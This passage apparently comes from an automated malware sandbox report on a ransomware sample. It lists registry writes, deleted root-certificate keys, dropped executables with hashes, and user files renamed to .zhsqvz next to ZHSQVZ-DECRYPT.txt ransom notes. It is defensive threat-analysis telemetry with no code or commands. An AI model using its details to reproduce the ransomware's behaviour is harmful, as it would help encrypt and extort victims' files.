9A826FCD86D324668FA8155391D23B31830ACF2592CD843C527C09E48D4A170BE8C24AC6B9275663A3C4F4E2023D6F7C3FAF1DFB7E7EA7F08ACB1354493B94D450B345B6626A381ACDDC06BC1465C87A4C6C0F0EA8BA1B4D67A1AB4DB3D434A6D53B5D47E06E0F52DD3969DCE9155320C8ACFDC36E88789FC93320F6515E7C4FFF29CAFDA3604563ABBB49FEBB5B7CC119B1DAA1F86351B326D98496B6602F848218B3050AD31CA37CD822AACB275426DF10C1E0534E1739FF897267F73E7DF79C5A4617E0A5ACAD14101147B3C8F222A05D507C1B059F73312348D136A04001A20DB30E5CD51D9E9E310EF7BFBB7C4C87D43471B0ACB035DA77B1C493000BD30D0ED1F484236D987D2CA48EE8FBEE6F24F1BF1A5355D5C43C41422110AA7EF27C4FA15A174C4F556657349C533738D61FB72998CFE24E6B78FAE024385288494595BD5DC78D79B0A672D934C1BEA5A82AB0F43B8EB0FA9104AEBA3CEE13F4CAA5F2C4676CFC8D280D70F6E33B01C1B30978C5C6C48E424E728DDFBA42AEBC7CE7A999C3FF07DC111756670B7807FAC5E8C1CDF9AF6B5CB450E246CF53CA6D042DAD959378058110DA0111A285ECB5FDC3D3739356CC05F1E4B33C3B6BCE56442B5253879BBECBFC4333FB05D056E68D9FF5BA7C94734C95B3C1DC9389B1107AD5251A6C5213B2F712376BDC74D98B9DDC055820435276BBF8E7566E6C6C0C263CA0509F862CE370AD4D4EF4454D47E6B8B814671A270E23D67EDA93234BD2EC5C9E4E91CFBBB55904FE2A821DCDF7B7E8F696A6FDE0348C1EDDA2557BD2CFABA58D66968A8E8F99F46D00B6966CB3BCA90DFA447A50203015C39558F08982FC58EABD3C3
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
EnableFileTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
EnableConsoleTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
FileTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
ConsoleTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
MaxFileSize
1048576
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
FileDirectory
%windir%\tracing
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
EnableFileTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
EnableConsoleTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
FileTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
ConsoleTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
MaxFileSize
1048576
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
FileDirectory
%windir%\tracing
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006B000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2180
3468116065.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510
2180
3468116065.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Blob
040000000100000010000000C5DFB849CA051355EE2DBA1AC33EB0280F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB090000000100000054000000305206082B0601050507030106082B0601050507030206082B0601050507030306082B0601050507030406082B06010505070308060A2B0601040182370A030406082B0601050507030606082B060105050703070B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D0020005200330000005300000001000000230000003021301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B1400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA953030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F2000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F
2180
3468116065.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD

Files activity

Executable files
14
Suspicious files
280
Text files
210
Unknown types
8

Dropped files

PID
Process
Filename
Type
3784
powershell.exe
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
executable
MD5: 3abb1f4a8f2fdeb302985911bfefd6bf
SHA256: 5e901677dad76c0dc21da659115b4d08e1e27c279c1cd038518ae1518646c306
2928
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\1958842343.exe
executable
MD5: b58fe475f58e3070e3f506085108ef76
SHA256: 35de112de2021eb54dea91383112609551240db7d95ac0171d224ca13fa4e0e5
3736
2746537711.exe
C:\Users\admin\657607470096780\winsvcs.exe
executable
MD5: b58fe475f58e3070e3f506085108ef76
SHA256: 35de112de2021eb54dea91383112609551240db7d95ac0171d224ca13fa4e0e5
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\3875839546.exe
executable
MD5: 9cce24e78759e70020a4c1c82359f471
SHA256: 9a3064a02f7d45b5d073d5653c53694ebfd37af6255a0b928703a11eac4a142d
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exe
executable
MD5: 9cce24e78759e70020a4c1c82359f471
SHA256: 9a3064a02f7d45b5d073d5653c53694ebfd37af6255a0b928703a11eac4a142d
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\3468116065.exe
executable
MD5: 5a31e0ae80102a6b25fa0ca56cf7c15e
SHA256: dc92a406ec40d1356abbd8dd8ea8ca90ae84516b741d3d898f892db31d470480
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exe
executable
MD5: b58fe475f58e3070e3f506085108ef76
SHA256: 35de112de2021eb54dea91383112609551240db7d95ac0171d224ca13fa4e0e5
2928
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\3088011411.exe
executable
MD5: 9cce24e78759e70020a4c1c82359f471
SHA256: 9a3064a02f7d45b5d073d5653c53694ebfd37af6255a0b928703a11eac4a142d
3844
979574639568794.exe
C:\Users\admin\495030305060\winsvcs.exe
executable
MD5: 3abb1f4a8f2fdeb302985911bfefd6bf
SHA256: 5e901677dad76c0dc21da659115b4d08e1e27c279c1cd038518ae1518646c306
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\3358028963.exe
executable
MD5: b58fe475f58e3070e3f506085108ef76
SHA256: 35de112de2021eb54dea91383112609551240db7d95ac0171d224ca13fa4e0e5
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exe
executable
MD5: 5a31e0ae80102a6b25fa0ca56cf7c15e
SHA256: dc92a406ec40d1356abbd8dd8ea8ca90ae84516b741d3d898f892db31d470480
3676
3875839546.exe
C:\Users\admin\4950606094303050\wincfg32svc.exe
executable
MD5: 9cce24e78759e70020a4c1c82359f471
SHA256: 9a3064a02f7d45b5d073d5653c53694ebfd37af6255a0b928703a11eac4a142d
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\3782739527.exe
executable
MD5: 5a31e0ae80102a6b25fa0ca56cf7c15e
SHA256: dc92a406ec40d1356abbd8dd8ea8ca90ae84516b741d3d898f892db31d470480
2648
winsvcs.exe
C:\Users\admin\AppData\Local\Temp\2746537711.exe
executable
MD5: b58fe475f58e3070e3f506085108ef76
SHA256: 35de112de2021eb54dea91383112609551240db7d95ac0171d224ca13fa4e0e5
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.zhsqvz
binary
MD5: adb57e5082f6837779d3992a5ab58660
SHA256: 60881326c0d0b0a19638b7fd92db7dd3ed9a719899b4b1434f7c63a9ab9a8755
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.zhsqvz
binary
MD5: 1517e2c0930d7070378e2cd0a3591a21
SHA256: 6c72c3f7f46856e4a11b2374169629c559f5e6d9040297528288e9708f4c119d
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.zhsqvz
binary
MD5: a8a4159fb62589586a792b5b7db93f7b
SHA256: d571833a06b402ff5f9c79a21d8cf35e7a021f9f1c3aeba76861111f539755cb
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.zhsqvz
binary
MD5: 1e8bc6261c7dbaae5305a286b528b76f
SHA256: 685b2393f8c6a4d86defb1b6fedf0de5978eb9051724d016f5262aee00561129
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.zhsqvz
binary
MD5: 3edd5d7fbc77e792e0977b48b771bfe6
SHA256: c5ab03c4ebb4fd00b7fe6944b78d201c5d6f910025def510461ae2773c0b25a1
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.zhsqvz
binary
MD5: 84f19a7bb4b818fe4037278eca56bf9b
SHA256: b84be55b0933933e7912895bff579fbdf1d43894646e5667a96f3597fbb279f7
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.zhsqvz
binary
MD5: 65bc0c88700218972dc06fbabc05254c
SHA256: c2d42fbb24f90ad5cb243efb76426540184a89abf811d7459b8c852cc863fce8
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.zhsqvz
binary
MD5: 63b25f2ede97186a46e4e3b79f867253
SHA256: 3b821058a0d0a11e40ee9be2ba5e0d2c1ba6ecf9ef382caa9b0e981fc4384176
2180
3468116065.exe
C:\Users\Public\Music\Sample Music\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Libraries\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Documents\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Pictures\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Music\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Downloads\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Favorites\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Videos\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.zhsqvz
binary
MD5: ca17b497111bc74c1ded86c0bed35470
SHA256: 9a12c961ed204dc9377ce1abaec1dc30f976504a3c96d298a144dca5ebcbdad0
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.zhsqvz
binary
MD5: 743872f35876b93de2461f2e36003102
SHA256: bbad6e7cd48ead7b7b52b187c0d75654176e72295836e5bbf41cb54f233b44ea
2180
3468116065.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Saved Games\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Searches\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Pictures\senseshot.jpg.zhsqvz
binary
MD5: a06439967469748f4730f904b66babd2
SHA256: 373e59db9ec0546e6e2dad4e1fc7c4c9bfc566311ca7ed711d25d5144be43599
2180
3468116065.exe
C:\Users\admin\Pictures\senseshot.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Pictures\programsmarch.jpg.zhsqvz
binary
MD5: a70c30aea7ae46acd477411772e77d9d
SHA256: 766be0865fe33daacfd6fdbe31dfd81e0cbc23a8a89d75b162161d8ae47810eb
2180
3468116065.exe
C:\Users\admin\Pictures\mountainpresented.jpg.zhsqvz
binary
MD5: 2d2f32d3a34a640772a9b962418018b3
SHA256: 587a082cf67410be25067916c0f31a35535b250e764714b872215b35399c124a
2180
3468116065.exe
C:\Users\admin\Pictures\programsmarch.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Pictures\mountainpresented.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Pictures\farupon.png.zhsqvz
binary
MD5: b4a8436800e8e1e9c464d6f61d87b4b9
SHA256: a037425feb5b3997b7b7cecb7fe757ef69a5d413a9b5d115426681d46b842adc
2180
3468116065.exe
C:\Users\admin\Pictures\healththroughout.jpg.zhsqvz
binary
MD5: d213760ae37e4b6e82246c7b14f70421
SHA256: 2d84faa942b5a7af730d02ec50dc756037509c1e1799d4503b2078be2bb2f630
2180
3468116065.exe
C:\Users\admin\Pictures\farupon.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Pictures\healththroughout.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\ntuser.ini.zhsqvz
binary
MD5: 26414facb6c4b737d468e9d36ccf20e7
SHA256: ffca7127f3b253485d05077480738210425d700bbfc8c81bb432f317c63e2fc1
2180
3468116065.exe
C:\Users\admin\Pictures\everyoneebay.jpg.zhsqvz
fli
MD5: 704836547f7b3cc47c9415774e57a629
SHA256: 0c4db1a5b73b6d480d63d4feee4002fec1eac7e206851ed9f6d65a4a8bc2ae8e
2180
3468116065.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Pictures\everyoneebay.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Links\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.zhsqvz
binary
MD5: 1f2a782383aebe2520192f3cd70a75dc
SHA256: 5a9e01e0c91d9965e73678ff0aec5241fcce3e0dc2b0186e6279663d5b0c9461
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.zhsqvz
bs
MD5: 44dffb9eb8eab9f421e3ea1c4c7aa5fc
SHA256: 72c88d8d29417471fb65f9d4c0967354f356b8cbcc07b000127e2317d5277069
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.zhsqvz
binary
MD5: 0dd1bd596bc32cf1db33b9d13d217a13
SHA256: 95eb91e0caf2d582e55c39931169a7a7b9f1e4afe4ff93e0a44999e02aa8acad
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.zhsqvz
binary
MD5: eb20a469f6241af91bd2b2a8bb290779
SHA256: 862c9cfdc98b2eef401d930bbd4bb8c3dc79da9c157ea74331ee6aebf0832eeb
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.zhsqvz
binary
MD5: c3e2e5fa8d6b7c45c13c56f552e3e31d
SHA256: 2f7b476add874974f023d12395b7df4d117f7f8221b20ac69ded5b232814f193
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.zhsqvz
binary
MD5: 94d76aa98cd8cf94a8cb21f4dfccafa8
SHA256: e03e44a5992b5c6b892f12d6c7422fc422da909f31d43d69d53f070025aa71fc
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.zhsqvz
binary
MD5: 2f7573a11da346d1dafea1b78c753aef
SHA256: 843b99ed28ee839d8afc5a31d0e46010bf0fc7713625af4207973dbad009952c
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.zhsqvz
binary
MD5: 724db9105478317e27f4cdccf408eaa9
SHA256: ef4eb5a65163120066b539de5db8b8d5a70b440bce690c4bb4490c5eecd55411
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.zhsqvz
binary
MD5: 9a6f3d47b85228440d03b606dacc2c80
SHA256: 549790e2722d8ad04c558f532a1d99a47f1dd52326a1479a64e313d22f0b031e
2180
3468116065.exe
